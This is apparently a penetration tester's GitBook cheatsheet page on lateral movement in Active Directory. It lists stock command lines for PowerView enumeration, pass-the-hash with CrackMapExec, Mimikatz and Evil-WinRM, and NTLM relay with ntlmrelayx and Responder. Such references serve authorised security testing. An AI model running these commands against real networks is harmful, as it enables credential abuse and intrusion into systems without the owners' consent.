Cheatsheet
  • Pentest
    • Reconnaissance
    • Network Scanning and Enumeration
    • Active Directory
      • Enumeration
      • Getting Credentials
      • Lateral Movement
      • Privilege Escalation
Powered by GitBook
On this page
  1. Pentest
  2. Active Directory

Lateral Movement

  1. PowerView Description: Enumerate AD information to identify targets for lateral movement. Tools/Commands:

    • Import-Module PowerView; Get-NetGroupMember -GroupName "Administrators"

    • Get-NetSession

    • Find-DomainShare

  2. Pass-the-Hash (PtH) Description: Authenticate to remote systems using NTLM hashes instead of passwords. Tools/Commands:

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -H <HASH>

    • Mimikatz: sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH>

    • Evil-WinRM: evil-winrm -i <IP> -u <USER> -H <HASH>

  3. NTLM Relay Description: Relay NTLM authentication to authenticate against other systems. Tools/Commands:

    • NTLMRelayX: ntlmrelayx.py -t <target>

    • Responder: responder -I <interface>

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS>

PreviousGetting CredentialsNextPrivilege Escalation

Last updated 6 months ago